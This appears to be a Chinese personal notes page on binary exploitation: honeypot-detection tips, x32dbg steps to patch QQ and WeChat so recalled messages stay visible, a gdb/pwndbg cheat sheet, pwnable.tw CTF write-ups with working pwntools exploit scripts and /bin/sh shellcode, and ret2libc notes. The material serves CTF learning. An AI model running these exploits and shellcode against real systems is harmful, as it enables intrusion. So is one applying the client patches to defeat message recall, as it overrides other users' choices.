0%

根据最近几天测试蜜罐的经验整理出常见问题

  1. nmap 扫描结果部分 version 信息缺失
  2. 蜜罐在被扫描时,有些服务会不稳定,如:卡顿、端口 filtered 、 web 服务返回码为 5xx
  3. 主机操作系统与运行的服务相冲突,如 Linux 主机运行 mssql 服务
  4. 蜜罐可能存在任意密码登陆
  5. 有些端口的 banner 会有相关提示,如:Tanner Server ,甚至有些 web 服务会暴露蜜罐的配置页面
  6. 有人偷懒拿别人的直接用,导致网页源代码可能会被人留下一些提示
  7. ssh 或 telnet 登陆后使用一些命令会有问题。如:cat 只能获取指定文件;使用 touch 创建文件后,在另一个终端看不到;缺少常用指令,如:locate、find;vi 不能打开文件;无法执行复杂指令,如:可以执行 echo 123,却不可以执行 echo 123 > tmp

QQ

  1. 运行 QQ,打开 x32dbg,附加到进程 QQ.exe
  2. 符号面板找到 im.dll 并进入
  3. 搜索关键字符串:bytes_reserved
  4. 双击进入第三个字符串,在入口的上一条地址处,修改汇编指令,让其直接到达 test eax,eax 命令处
  5. 搜索关键字符串:bytes_userdef
  6. 双击进入 push 语句的字符串,在入口处修改汇编指令,让其直接到达 test eax,eax 命令处
  7. patch,替换 dll

tips:bytes_reserved 字符串负责个人信息的撤回,bytes_userdef 字符串负责群消息的撤回。

Wechat

  1. 启动微信,打开 x32dbg,附加到微信进程
  2. 符号面板找到 WeChatWin.dll 并进入
  3. 搜索关键字符串: revokemsg (push wechatwin.xxx)
  4. 把当前位置下的第一个call指令nop掉(Binary -> Fill with NOPs)
  5. patch,替换 dll

  1. backtrace 命令,简写 bt,用来查看当前进程的函数调用栈情况。

  2. list 命令,简写 l,回到栈列表,会将当前栈里的程序代码罗列出来,方便问题查找,需要有源码。

    • list 38 //查看38行附近10行代码
    • list 1,10 //查看1-10行
    • list main //查看main函数开始10行
  3. break 命令,简写 b,设置断点。

    • b *(0x123456) //常用,给 0x123456 地址处的指令下断点
      • b *rebase(0x123456)//rebase(0x123456) //rebase(0x123456)//rebase 在调试开PIE的程序的时候可以直接加上程序的随机地址
    • b fun_name //常用,给函数 fun_name下 断点,目标文件要保留符号才行
      • b file_name:fun_name
    • b file_name:15 //给 file_name 的 15 行下断点,要有源码才行
      • b 15
    • b +0x10 //在程序当前停住的位置下 0x10 的位置下断点,同样可以 -0x10,就是往前0x10
    • break fun if $rdi==5 //条件断点,rdi 值为 5 的时候断
  4. 查看、删除、禁用断点

    • 使用info break(简写: i b)来查看断点编号
    • delete 5 //常用,删除5号断点
    • disable 5 //常用,禁用5号断点
    • enable 5 //启用5号断点
    • clear //清除下面的所有断点
  5. 步入、步过、继续、运行

    • s //单步步入,遇到调用跟进函数中,相当于 step into,源码层面的一步
      • si //常用,同s,汇编层面的一步
    • n //单步补过,遇到电泳不跟进,相当于 step over,源码层面的一步
      • ni //常用,同n,汇编层面的一步
    • c //continue,常用,继续执行到断点,没断点就一直执行下去
    • r //run,常用,重新开始执行
  6. 回车键,将继续按照上条指令执行。

  7. print,简写 p,可打印表达式和变量的值,在 print 命令后追加 /format 可以格式化输出。/format 是一个 gdb 的格式化字符串,比较有用的格式化字符有 x:十进制数; c:字符; a:地址

    • p/x p/a p/b p/s …
    • p fun_name //打印fun_name的地址,需要保留符号
    • p 0x10-0x08 //计算0x10-0x08的结果
    • p &a //查看变量a的地址
    • p *(0x123456) //查看0x123456地址的值,注意和x指令的区别,x指令查看地址的值不用星号
    • p $rdi //显示rdi寄存器的值,注意和x的区别,这只是显示rdi的值,而不是rdi指向的值
      • p *($rdi) //显示rdi指向的值
  8. print-object,简写为 po,用来输出 obj-c 中的对象。它的工作原理是,向被调用的对象发送名为 debugDescription 的消息。它和常见的 description 消息很像。

  9. x 命令,格式:x/nuf address/$rdi 。nfu代表三个参数。

    • n代表显示几个单元(而不是显示几个字节,后面的u表示一个单元多少个字节),放在’/‘后面
    • u代表一个单元几个字节,b(一个字节),h(俩字节),w(四字节),g(八字节)
    • f代表显示数据的格式,f和u的顺序可以互换,也可以只有一个或者不带n,用的时候很灵活。
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      f列表
      x 按十六进制格式显示变量。
      d 按十进制格式显示变量。
      u 按十六进制格式显示无符号整型。
      o 按八进制格式显示变量。
      t 按二进制格式显示变量。
      a 按十六进制格式显示变量。
      c 按字符格式显示变量。
      f 按浮点数格式显示变量。
      s 按字符串显示。
      b 按字符显示。
      i 显示汇编指令。
  10. set 命令,设置变量的值,set。

    • set $rdi=0x10 //把rdi寄存器的值变为0x10
    • set *(0x123456)=0x10 //0x123456地址的值变为0x10,注意带星号
    • set args “abc” “def” “gh“//给参数123赋值
      • set args “python -c ‘print “1234\x7f\xde”’” //使用python给参数赋值不可见字符
  11. info 命令,查看内存地址所在信息。

    • i b //常用,info break 查看所有断点信息(编号、断点位置)
    • i r //常用,info registers 查看各个寄存器当前的值
    • i f //info function 查看所有函数名,需保留符号
  12. show 命令:显示 GDB 相关信息。

    • show args //查看参数
  13. q,退出

  14. 内存断点指令watch:

    • watch 0x123456 //0x123456地址的数据改变的时候会断
    • watch a //变量a改变的时候会断
    • info watchpoints //查看watch断点信息
  15. 捕获断点catch:

    • atch syscall //syscall系统调用的时候断住
    • catch syscall //syscall系统调用的时候断住,只断一次
    • info break //catch的断点可以通过i b查看
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      除syscall外还可以使用的有:
      1)throw: 抛出异常
      2)catch: 捕获异常
      3)exec: exec被调用
      4)fork: fork被调用
      5)vfork: vfork被调用
      6)load: 加载动态库
      7)load libname: 加载名为libname的动态库
      8)unload: 卸载动态库
      9)unload libname: 卸载名为libname的动态库
      10)syscall [args]: 调用系统调用,args可以指定系统调用号,或者系统名称
  16. disass address 显示地址附近的汇编指令

  17. 查找数据

    • search rdi //从当前位置向后查包含rdi的指令,返回若干
    • search -h //查看search帮助
    • find “hello” //查找hello字符串,pwndbg独有
    • ropgadget //查找ropgadget,pwndbg独有
  18. 堆操作指令(pwndbg插件独有)

    • arena //显示arena的详细信息
      • arenas //显示所有arena的基本信息
      • arenainfo //好看的显示所有arena的信息
    • bins //常用,查看所有种类的堆块的链表情况
      • fastbins //单独查看fastbins的链表情况
      • largebins //同上,单独查看largebins的链表情况
      • smallbins //同上,单独查看smallbins的链表情况
      • unsortedbin //同上,单独查看unsortedbin链表情况
      • tcachebins //同上,单独查看tcachebins的链表情况
        • tcache //查看tcache详细信息
    • heap //数据结构的形式显示所有堆块
      • heapbase //查看堆起始地址
      • heapinfo、heapinfoall //显示堆的信息
      • parseheap //显示堆结构,很好用
    • tracemalloc //好用,会跟提示所有操作堆的地方
  19. cyclc num //生成 num 个用来溢出的字符

  20. $reabse //开启PIE的情况的地址偏移

    • b *$reabse(0x123456) //断住PIE状态下的二进制文件中0x123456的地方
    • codebase //打印PIE偏移,与rebase不同,这是打印,rebase是使用
  21. stack //查看栈

    • retaddr //打印包含返回地址的栈地址
  22. canary //直接看canary的值

  23. plt //查看plt表

  24. got //查看got表

  25. hexdump //像IDA那样显示数据,带字符串

参考链接

Flag

争取每周做一题

Start

1
add     esp, 14h

可知,程序在第一次运行的返回前,会清空之前压入的字符串’Let’s start the CTF:’,所以我们可以将返回地址修改为0x08048087,这样将会执行一次sys_write,而且此时输出的就是esp的地址

1
2
3
4
5
.text:08048087 01C                 mov     ecx, esp        ; addr
.text:08048089 01C mov dl, 14h ; len
.text:0804808B 01C mov bl, 1 ; fd 0(标准输入)、 1(标准输出)、2(标准错误)
.text:0804808D 01C mov al, 4
.text:0804808F 01C int 80h ; LINUX - sys_write

编写shellcode并构造payload

最终代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *



def leak_esp(r):
address_1 = p32(0x08048087)
payload = 'a'*20+address_1
print r.recvuntil('CTF:')
r.send(payload)
esp = u32(r.recv()[:4])
print "Address of ESP: ", hex(esp)
return esp


# eax = 0xb:sys_execve
# ebx:file to execute
# ecx:command line parameters
# edx:environment block
# int 0x80:Linux系统调用
shellcode = asm('\n'.join([
'push %d' % u32('/sh\0'),
'push %d' % u32('/bin'),
'xor edx, edx',
'xor ecx, ecx',
'mov ebx, esp',
'mov eax, 0xb',
'int 0x80',
]))


if __name__ == "__main__":
context.arch = 'i386'
local = 0
if local:
r = process('./start')
else:
r = remote('chall.pwnable.tw', 10000)

esp = leak_esp(r)
payload = "A"*20 + p32(esp + 20) + shellcode #若不加20在获取的shell里输入命令会提示SIGSEGV后退出(感觉是堆栈不平衡导致的)
r.send(payload)
r.interactive()

crw

这个题写 shellcode 去读 “/home/orw/flag” 的内容,题目提示只允许用 open、read、write 这三个系统调用。通过 orw_seccomp() 实现,seccomp(short for secure computing mode) Linux 内核中的计算机安全设施,能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用 4 种系统调用(system calls),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。

根据 Linux Syscall Reference ,写出汇编代码,利用 pwntools 汇编。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *


# p = process('./orw')
p = remote('chall.pwnable.tw',10001)
shellcode = ""


# open(file,0,0) O_RDONLY is zero
# /home/orw/flag 转换为 16 进制为 2f686f6d652f6f72772f666c6167,即压栈数据,,如果你有强迫症可以在前面补斜杠或后面补零

shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x6761; push 0x6c662f77; push 0x726f2f65; push 0x6d6f682f; mov ebx,esp;xor edx,edx;int 0x80;')

#shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x67616c66; push 0x2f77726f; push 0x2f656d6f; push 0x682f2f2f; mov ebx,esp;xor edx,edx;int 0x80;') 前面补斜杠
#shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x00006761; push 0x6c662f77; push 0x726f2f65; push 0x6d6f682f; mov ebx,esp;xor edx,edx;int 0x80;') 后面补 0


# read(3,file,0x30) 此处 ebx/fd 是 0,1,2 没有回显,应使用最小的未使用的 fd 即 3,因为 0 1 2 已经被 linux 使用了,通常在程序中打开的 fd,是从 3 开始的。
shellcode += asm('mov eax,0x03;mov ecx,ebx;mov ebx,0x3;mov edx,0x30;int 0x80;')

# write(1,file,0x30)
shellcode += asm('mov eax,0x04;mov ebx,0x1;int 0x80;')

p.recvuntil('Give my your shellcode:')
p.send(shellcode)
p.interactive()

Buffer Overflow

程序未对buffer做长度检查,造成可以让攻击者输入过长的字串,覆盖其他数据,严重时可以控制程序流程

根据buffer位置分类可分为stack base、data base、heap base

stack base

待补充

data base

  • Vulnerable Function
    • gets
    • scanf
    • strcpy
    • sprintf
    • memcpy
    • strcat
    • …(没有长度检查)

From crash to exploit

Overwrite the return address

Intel 80x86是 little-endian(低在低),使用p32或者反过来填
PowerPC处理器是 big-endian

  • Return to Text
    1. 定位溢出的位置
      • cyclic
        • pwntools中使用 cyclic(num) & cyclic(“str”)
      • gdb pattern_create & crashoff
    2. 控制eip跳到原本程序中的代码
      • objdump查看函数位置
      • IDA
    3. Exploitation
      • Debug exploit
        • attach
  • Return to Shellcode
    • 。c’c’xdata段可执行且位置固定,往data段写shellcode再跳过去

heap base

待补充

Protection

ASLR

地址随机化

每次执行程序时,stack\heap\library 位置都变化

  • 查看是否开启ASLR
    • cat /proc/sys/kernel/randmiize_va_space

DEP (NX)

可写的不可执行,可执行的不可写

PIE(Position Independent Execution)

开启后 data 段和 code 段也会 ASLR

StackGuard (canary)

程序执行时随机生成的数,放进 stack 里,在 function return 时检查该值是否变动,若变动则结束程序

  • 常放在 tls 区段的 tcbhead_t 结构,在 x86/x64 架构下各有一个寄存器指向该结构,程序以寄存器存取该字段
    • x86:gs
    • x64:fs

RELRO

  • Disabled
    • .got/.got.plt 都可写
  • Partial(default)
    • .got 只读
  • Fulled
    • RELRO 保护下,再 load time 时将全部 function resolve 完毕后变成 read only

Lazy binding机制

Dynamic linking 的程序在执行时,有些 library 的函数可能到结束都不会执行到,所以 ELF 采取 Lazy binding 的机制,在第一次 call library 函数时,才会去寻找函数的真正位置进行 binding

  • GOT(Global offset Table)
    • 函数指标阵列,存储其他 library 中 function 的位置,因 lazy binding 机制,并不会一开始把正确的位置填上,而是天上一段 plt 位置的 code,当执行到 library 的 function 时才会真正去寻找 function,最后再把 GOT 中的位置填上真正的 function 位置
    • 分成 .got(保存全局变量引用位置) & .got.plt(保存函数引用位置)
    • .got.plt 前三项
      • address of .dynamic
      • link_map(将引用到的 library 串成的 linked list)
      • dl_runtime_resolve(用来找出函数位置的函数)
    • 找 got 位置
      • objdump -R elf or readelf -r elf
    • 为了实现 lazy binding 机制,got 可写,所以若程序有任意更改位置的漏洞,便可改写 got,改变程序流程

Return to Library

背景

  • 一般程序很少有 system 等,可以直接获得 shell 的 function 而且在 DEP/NX 的保护下无法直接填入 shellcode 去执行代码
  • Dynamic linking 情况下,大部分程序都会载入 libc,libc中有一些 function 可以达成我们的目的
    • system
    • execve
  • 一般情况下 ASLR 会开启,导致每次 libc 载入位置不固定,所以通常需要利用 information leak 的漏洞来获取 libc 的 base address 进而算出 system 等 function 位置,在将程序导过去

获得 libc 的位置

  • got
  • stack 上的残留值
    • function return 后不会将 stack 中的内容清除
  • heap 上的残留值
    • free 完之后在 malloc,也不会将 heap 存的内容清空

获得 function 在 libc 中的 offset

  • objdump -T libc.so.6 | grep function
  • IDA 中搜索

思路

  1. 获取 libc 任意一个函数的地址
  2. 根据该 function 在 libc 中的偏移获取 libc_base_address
    • vmmap、ldd、信息泄漏 等方式获取 libc版本
  3. 利用 system 在 libc 中的偏移和 libc_base_address 获得 system 的地址
    • system 和 sh 之间需加一个数来表示 ret,如
1
2

payload = p32(system_addr) + p32(0xdeadbeef) + p32(sh_addr)

reference

# Name eax ebx ecx edx esi edi ebp Definition
0 restart_syscall 0x00 - - - - - - kernel/signal.c:2501
1 exit 0x01 int error_code - - - - - kernel/exit.c:1095
2 fork 0x02 - - - - - - arch/x86/kernel/process.c:271
3 read 0x03 unsigned int fd char *buf size_t count - - - fs/read_write.c:460
4 write 0x04 unsigned int fd const char *buf size_t count - - - fs/read_write.c:477
5 open 0x05 const char *filename int flags umode_t mode - - - fs/open.c:1046
6 close 0x06 unsigned int fd - - - - - fs/open.c:1117
7 waitpid 0x07 pid_t pid int *stat_addr int options - - - kernel/exit.c:1879
8 creat 0x08 const char *pathname umode_t mode - - - - fs/open.c:1079
9 link 0x09 const char *oldname const char *newname - - - - fs/namei.c:3152
10 unlink 0x0a const char *pathname - - - - - fs/namei.c:2979
11 execve 0x0b const char *name const char *const *argv const char *const *envp - - - arch/x86/kernel/process.c:342
12 chdir 0x0c const char *filename - - - - - fs/open.c:375
13 time 0x0d time_t *tloc - - - - - kernel/time.c:62
14 mknod 0x0e const char *filename umode_t mode unsigned dev - - - fs/namei.c:2693
15 chmod 0x0f const char *filename umode_t mode - - - - fs/open.c:499
16 lchown 0x10 const char *filename uid_t user gid_t group - - - fs/open.c:586
17 break - - - - - - - Not implemented
18 oldstat 0x12 const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:155
19 lseek 0x13 unsigned int fd off_t offset unsigned int origin - - - fs/read_write.c:230
20 getpid 0x14 - - - - - - kernel/timer.c:1413
21 mount 0x15 char *dev_name char *dir_name char *type unsigned long flags void *data - fs/namespace.c:2362
22 umount 0x16 char *name int flags - - - - fs/namespace.c:1190
23 setuid 0x17 uid_t uid - - - - - kernel/sys.c:761
24 getuid 0x18 - - - - - - kernel/timer.c:1435
25 stime 0x19 time_t *tptr - - - - - kernel/time.c:81
26 ptrace 0x1a long request long pid unsigned long addr unsigned long data - - kernel/ptrace.c:857
27 alarm 0x1b unsigned int seconds - - - - - kernel/timer.c:1390
28 oldfstat 0x1c unsigned int fd struct __old_kernel_stat *statbuf - - - - fs/stat.c:181
29 pause 0x1d - - - - - - kernel/signal.c:3245
30 utime 0x1e char *filename struct utimbuf *times - - - - fs/utimes.c:27
31 stty - - - - - - - Not implemented
32 gtty - - - - - - - Not implemented
33 access 0x21 const char *filename int mode - - - - fs/open.c:370
34 nice 0x22 int increment - - - - - kernel/sched/core.c:4119
35 ftime - - - - - - - Not implemented
36 sync 0x24 - - - - - - fs/sync.c:98
37 kill 0x25 pid_t pid int sig - - - - kernel/signal.c:2841
38 rename 0x26 const char *oldname const char *newname - - - - fs/namei.c:3403
39 mkdir 0x27 const char *pathname umode_t mode - - - - fs/namei.c:2751
40 rmdir 0x28 const char *pathname - - - - - fs/namei.c:2870
41 dup 0x29 unsigned int fildes - - - - - fs/fcntl.c:131
42 pipe 0x2a int *fildes - - - - - fs/pipe.c:1149
43 times 0x2b struct tms *tbuf - - - - - kernel/sys.c:1058
44 prof - - - - - - - Not implemented
45 brk 0x2d unsigned long brk - - - - - mm/mmap.c:246
46 setgid 0x2e gid_t gid - - - - - kernel/sys.c:614
47 getgid 0x2f - - - - - - kernel/timer.c:1447
48 signal 0x30 int sig __sighandler_t handler - - - - kernel/signal.c:3228
49 geteuid 0x31 - - - - - - kernel/timer.c:1441
50 getegid 0x32 - - - - - - kernel/timer.c:1453
51 acct 0x33 const char *name - - - - - kernel/acct.c:255
52 umount2 0x34 char *name int flags - - - - fs/namespace.c:1190
53 lock - - - - - - - Not implemented
54 ioctl 0x36 unsigned int fd unsigned int cmd unsigned long arg - - - fs/ioctl.c:604
55 fcntl 0x37 unsigned int fd unsigned int cmd unsigned long arg - - - fs/fcntl.c:442
56 mpx - - - - - - - Not implemented
57 setpgid 0x39 pid_t pid pid_t pgid - - - - kernel/sys.c:1083
58 ulimit - - - - - - - Not implemented
59 oldolduname 0x3b struct oldold_utsname *name - - - - - kernel/sys.c:1330
60 umask 0x3c int mask - - - - - kernel/sys.c:1782
61 chroot 0x3d const char *filename - - - - - fs/open.c:422
62 ustat 0x3e unsigned dev struct ustat *ubuf - - - - fs/statfs.c:222
63 dup2 0x3f unsigned int oldfd unsigned int newfd - - - - fs/fcntl.c:116
64 getppid 0x40 - - - - - - kernel/timer.c:1424
65 getpgrp 0x41 - - - - - - kernel/sys.c:1184
66 setsid 0x42 - - - - - - kernel/sys.c:1219
67 sigaction 0x43 int sig const struct old_sigaction *act struct old_sigaction *oact - - - arch/x86/kernel/signal.c:487
68 sgetmask 0x44 - - - - - - kernel/signal.c:3207
69 ssetmask 0x45 int newmask - - - - - kernel/signal.c:3213
70 setreuid 0x46 uid_t ruid uid_t euid - - - - kernel/sys.c:690
71 setregid 0x47 gid_t rgid gid_t egid - - - - kernel/sys.c:557
72 sigsuspend 0x48 int history0 int history1 old_sigset_t mask - - - arch/x86/kernel/signal.c:479
73 sigpending 0x49 old_sigset_t *set - - - - - kernel/signal.c:3107
74 sethostname 0x4a char *name int len - - - - kernel/sys.c:1365
75 setrlimit 0x4b unsigned int resource struct rlimit *rlim - - - - kernel/sys.c:1641
76 getrlimit 0x4c unsigned int resource struct rlimit *rlim - - - - kernel/sys.c:1440
77 getrusage 0x4d int who struct rusage *ru - - - - kernel/sys.c:1774
78 gettimeofday 0x4e struct timeval *tv struct timezone *tz - - - - kernel/time.c:101
79 settimeofday 0x4f struct timeval *tv struct timezone *tz - - - - kernel/time.c:179
80 getgroups 0x50 int gidsetsize gid_t *grouplist - - - - kernel/groups.c:202
81 setgroups 0x51 int gidsetsize gid_t *grouplist - - - - kernel/groups.c:231
82 select 0x52 int n fd_set *inp fd_set *outp fd_set *exp struct timeval *tvp - fs/select.c:593
83 symlink 0x53 const char *oldname const char *newname - - - - fs/namei.c:3039
84 oldlstat 0x54 const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:168
85 readlink 0x55 const char *path char *buf int bufsiz - - - fs/stat.c:321
86 uselib 0x56 const char *library - - - - - fs/exec.c:116
87 swapon 0x57 const char *specialfile int swap_flags - - - - mm/swapfile.c:1996
88 reboot 0x58 int magic1 int magic2 unsigned int cmd void *arg - - kernel/sys.c:432
89 readdir 0x59 unsigned int fd struct old_linux_dirent *dirent unsigned int count - - - fs/readdir.c:105
90 mmap 0x5a unsigned long addr unsigned long len unsigned long prot unsigned long flags unsigned long fd unsigned long off arch/x86/kernel/sys_x86_64.c:84
91 munmap 0x5b unsigned long addr size_t len - - - - mm/mmap.c:2141
92 truncate 0x5c const char *path long length - - - - fs/open.c:128
93 ftruncate 0x5d unsigned int fd unsigned long length - - - - fs/open.c:178
94 fchmod 0x5e unsigned int fd umode_t mode - - - - fs/open.c:472
95 fchown 0x5f unsigned int fd uid_t user gid_t group - - - fs/open.c:605
96 getpriority 0x60 int which int who - - - - kernel/sys.c:241
97 setpriority 0x61 int which int who int niceval - - - kernel/sys.c:172
98 profil - - - - - - - Not implemented
99 statfs 0x63 const char *pathname struct statfs *buf - - - - fs/statfs.c:166
100 fstatfs 0x64 unsigned int fd struct statfs *buf - - - - fs/statfs.c:187
101 ioperm 0x65 unsigned long from unsigned long num int turn_on - - - arch/x86/kernel/ioport.c:23
102 socketcall 0x66 int call unsigned long *args - - - - net/socket.c:2355
103 syslog 0x67 int type char *buf int len - - - kernel/printk.c:1195
104 setitimer 0x68 int which struct itimerval *value struct itimerval *ovalue - - - kernel/itimer.c:278
105 getitimer 0x69 int which struct itimerval *value - - - - kernel/itimer.c:103
106 stat 0x6a const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:155
107 lstat 0x6b const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:168
108 fstat 0x6c unsigned int fd struct __old_kernel_stat *statbuf - - - - fs/stat.c:181
109 olduname 0x6d struct oldold_utsname *name - - - - - kernel/sys.c:1330
110 iopl 0x6e unsigned int level - - - - - arch/x86/kernel/ioport.c:96
111 vhangup 0x6f - - - - - - fs/open.c:1156
112 idle - - - - - - - Not implemented
113 vm86old 0x71 struct vm86_struct *v86 - - - - - arch/x86/kernel/vm86_32.c:203
114 wait4 0x72 pid_t upid int *stat_addr int options struct rusage *ru - - kernel/exit.c:1834
115 swapoff 0x73 const char *specialfile - - - - - mm/swapfile.c:1539
116 sysinfo 0x74 struct sysinfo *info - - - - - kernel/timer.c:1641
117 ipc 0x75 unsigned int call int first unsigned long second unsigned long third void *ptr long fifth ipc/syscall.c:16
118 fsync 0x76 unsigned int fd - - - - - fs/sync.c:201
119 sigreturn 0x77 - - - - - - arch/x86/kernel/signal.c:543
120 clone 0x78 unsigned long clone_flags unsigned long newsp void *parent_tid void *child_tid - - arch/x86/kernel/process.c:293
121 setdomainname 0x79 char *name int len - - - - kernel/sys.c:1416
122 uname 0x7a struct old_utsname *name - - - - - kernel/sys.c:1311
123 modify_ldt 0x7b int func void *ptr unsigned long bytecount - - - arch/x86/kernel/ldt.c:247
124 adjtimex 0x7c struct timex *txc_p - - - - - kernel/time.c:200
125 mprotect 0x7d unsigned long start size_t len unsigned long prot - - - mm/mprotect.c:232
126 sigprocmask 0x7e int how old_sigset_t *nset old_sigset_t *oset - - - kernel/signal.c:3125
127 create_module - - - - - - - Not implemented
128 init_module 0x80 void *umod unsigned long len const char *uargs - - - kernel/module.c:3010
129 delete_module 0x81 const char *name_user unsigned int flags - - - - kernel/module.c:768
130 get_kernel_syms - - - - - - - Not implemented
131 quotactl 0x83 unsigned int cmd const char *special qid_t id void *addr - - fs/quota/quota.c:346
132 getpgid 0x84 pid_t pid - - - - - kernel/sys.c:1154
133 fchdir 0x85 unsigned int fd - - - - - fs/open.c:396
134 bdflush 0x86 int func long data - - - - fs/buffer.c:3130
135 sysfs 0x87 int option unsigned long arg1 unsigned long arg2 - - - fs/filesystems.c:183
136 personality 0x88 unsigned int personality - - - - - kernel/exec_domain.c:182
137 afs_syscall - - - - - - - Not implemented
138 setfsuid 0x8a uid_t uid - - - - - kernel/sys.c:969
139 setfsgid 0x8b gid_t gid - - - - - kernel/sys.c:1008
140 _llseek 0x8c unsigned int fd unsigned long offset_high unsigned long offset_low loff_t *result unsigned int origin - fs/read_write.c:254
141 getdents 0x8d unsigned int fd struct linux_dirent *dirent unsigned int count - - - fs/readdir.c:191
142 _newselect 0x8e int n fd_set *inp fd_set *outp fd_set *exp struct timeval *tvp - fs/select.c:593
143 flock 0x8f unsigned int fd unsigned int cmd - - - - fs/locks.c:1636
144 msync 0x90 unsigned long start size_t len int flags - - - mm/msync.c:31
145 readv 0x91 unsigned long fd const struct iovec *vec unsigned long vlen - - - fs/read_write.c:787
146 writev 0x92 unsigned long fd const struct iovec *vec unsigned long vlen - - - fs/read_write.c:808
147 getsid 0x93 pid_t pid - - - - - kernel/sys.c:1191
148 fdatasync 0x94 unsigned int fd - - - - - fs/sync.c:206
149 _sysctl 0x95 struct __sysctl_args *args - - - - - kernel/sysctl_binary.c:1444
150 mlock 0x96 unsigned long start size_t len - - - - mm/mlock.c:482
151 munlock 0x97 unsigned long start size_t len - - - - mm/mlock.c:512
152 mlockall 0x98 int flags - - - - - mm/mlock.c:549
153 munlockall 0x99 - - - - - - mm/mlock.c:582
154 sched_setparam 0x9a pid_t pid struct sched_param *param - - - - kernel/sched/core.c:4477
155 sched_getparam 0x9b pid_t pid struct sched_param *param - - - - kernel/sched/core.c:4512
156 sched_setscheduler 0x9c pid_t pid int policy struct sched_param *param - - - kernel/sched/core.c:4462
157 sched_getscheduler 0x9d pid_t pid - - - - - kernel/sched/core.c:4486
158 sched_yield 0x9e - - - - - - kernel/sched/core.c:4711
159 sched_get_priority_max 0x9f int policy - - - - - kernel/sched/core.c:4935
160 sched_get_priority_min 0xa0 int policy - - - - - kernel/sched/core.c:4960
161 sched_rr_get_interval 0xa1 pid_t pid struct timespec *interval - - - - kernel/sched/core.c:4985
162 nanosleep 0xa2 struct timespec *rqtp struct timespec *rmtp - - - - kernel/hrtimer.c:1621
163 mremap 0xa3 unsigned long addr unsigned long old_len unsigned long new_len unsigned long flags unsigned long new_addr - mm/mremap.c:431
164 setresuid 0xa4 uid_t ruid uid_t euid uid_t suid - - - kernel/sys.c:808
165 getresuid 0xa5 uid_t *ruidp uid_t *euidp uid_t *suidp - - - kernel/sys.c:873
166 vm86 0xa6 unsigned long cmd unsigned long arg - - - - arch/x86/kernel/vm86_32.c:232
167 query_module - - - - - - - Not implemented
168 poll 0xa8 struct pollfd *ufds unsigned int nfds int timeout_msecs - - - fs/select.c:908
169 nfsservctl - - - - - - - Not implemented
170 setresgid 0xaa gid_t rgid gid_t egid gid_t sgid - - - kernel/sys.c:893
171 getresgid 0xab gid_t *rgidp gid_t *egidp gid_t *sgidp - - - kernel/sys.c:945
172 prctl 0xac int option unsigned long arg2 unsigned long arg3 unsigned long arg4 unsigned long arg5 - kernel/sys.c:1999
173 rt_sigreturn 0xad - - - - - - arch/x86/kernel/signal.c:571
174 rt_sigaction 0xae int sig const struct sigaction *act struct sigaction *oact size_t sigsetsize - - kernel/signal.c:3174
175 rt_sigprocmask 0xaf int how sigset_t *nset sigset_t *oset size_t sigsetsize - - kernel/signal.c:2591
176 rt_sigpending 0xb0 sigset_t *set size_t sigsetsize - - - - kernel/signal.c:2651
177 rt_sigtimedwait 0xb1 const sigset_t *uthese siginfo_t *uinfo const struct timespec *uts size_t sigsetsize - - kernel/signal.c:2805
178 rt_sigqueueinfo 0xb2 pid_t pid int sig siginfo_t *uinfo - - - kernel/signal.c:2938
179 rt_sigsuspend 0xb3 sigset_t *unewset size_t sigsetsize - - - - kernel/signal.c:3274
180 pread64 0xb4 char *buf size_t count loff_t pos - - - - fs/read_write.c:495
181 pwrite64 0xb5 const char *buf size_t count loff_t pos - - - - fs/read_write.c:524
182 chown 0xb6 const char *filename uid_t user gid_t group - - - fs/open.c:540
183 getcwd 0xb7 char *buf unsigned long size - - - - fs/dcache.c:2885
184 capget 0xb8 cap_user_header_t header cap_user_data_t dataptr - - - - kernel/capability.c:158
185 capset 0xb9 cap_user_header_t header const cap_user_data_t data - - - - kernel/capability.c:232
186 sigaltstack 0xba const stack_t *uss stack_t *uoss - - - - arch/x86/kernel/signal.c:533
187 sendfile 0xbb int out_fd int in_fd off_t *offset size_t count - - fs/read_write.c:973
188 getpmsg - - - - - - - Not implemented
189 putpmsg - - - - - - - Not implemented
190 vfork 0xbe - - - - - - arch/x86/kernel/process.c:286
191 ugetrlimit 0xbf unsigned int resource struct rlimit *rlim - - - - kernel/sys.c:1440
192 mmap2 0xc0 unsigned long addr unsigned long len unsigned long prot unsigned long flags unsigned long fd unsigned long pgoff mm/mmap.c:1105
193 truncate64 0xc1 loff_t length - - - - - fs/open.c:188
194 ftruncate64 0xc2 loff_t length - - - - - fs/open.c:200
195 stat64 0xc3 const char *filename struct stat64 *statbuf - - - - fs/stat.c:372
196 lstat64 0xc4 const char *filename struct stat64 *statbuf - - - - fs/stat.c:384
197 fstat64 0xc5 unsigned long fd struct stat64 *statbuf - - - - fs/stat.c:396
198 lchown32 0xc6 const char *filename uid_t user gid_t group - - - fs/open.c:586
199 getuid32 0xc7 - - - - - - kernel/timer.c:1435
200 getgid32 0xc8 - - - - - - kernel/timer.c:1447
201 geteuid32 0xc9 - - - - - - kernel/timer.c:1441
202 getegid32 0xca - - - - - - kernel/timer.c:1453
203 setreuid32 0xcb uid_t ruid uid_t euid - - - - kernel/sys.c:690
204 setregid32 0xcc gid_t rgid gid_t egid - - - - kernel/sys.c:557
205 getgroups32 0xcd int gidsetsize gid_t *grouplist - - - - kernel/groups.c:202
206 setgroups32 0xce int gidsetsize gid_t *grouplist - - - - kernel/groups.c:231
207 fchown32 0xcf unsigned int fd uid_t user gid_t group - - - fs/open.c:605
208 setresuid32 0xd0 uid_t ruid uid_t euid uid_t suid - - - kernel/sys.c:808
